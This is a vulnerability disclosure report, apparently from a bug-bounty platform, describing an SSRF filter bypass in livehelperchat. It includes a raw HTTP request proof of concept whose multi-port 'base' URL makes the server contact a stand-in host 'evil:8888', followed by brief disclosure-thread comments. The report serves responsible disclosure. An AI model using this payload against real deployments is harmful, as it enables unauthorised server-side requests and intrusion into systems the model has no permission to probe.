SSRF filter bypass port 80, 433 in livehelperchat/livehelperchat
Valid
Reported on
Apr 4th 2022
Description
To exploit vulnerability, someone must pass a "base" parameters with a url multi-port to bypass filter check.
Proof of Concept
GET /index.php/cobrowse/proxycss/1?base=http://evil:8888:80/&css=index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESS02163d6deb6c206a82729b5648c7ccb7=VGWS8m-s8l4LTBWIdx4SLEWp_4CV9zQUVMQe3TH-r5k; sugar_user_theme=SuiteP; ck_login_id_20=1; ck_login_language_20=en_us; lhc_rm_u=OZNdQ2asyhNnFWUiUssqS4RZIpsGw1%3A2%3A8832b6cb3f51bd8dfb6ef6068cca39ad9425a209; lhc_vid=592659a2bfdb4f609558
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
the server will make http request to evil:8888
Impact
An attacker could make the application perform arbitrary requests, bypass CVE-2022-1191
We are processing your report and will contact the
livehelperchat
team within 24 hours.
a year ago
Nhien.IT modified the report
a year ago
Nhien.IT modified the report
a year ago
Nhien.IT modified the report
a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Next time you can just crate here an issue, no need to duplicate in github :)
to join this conversation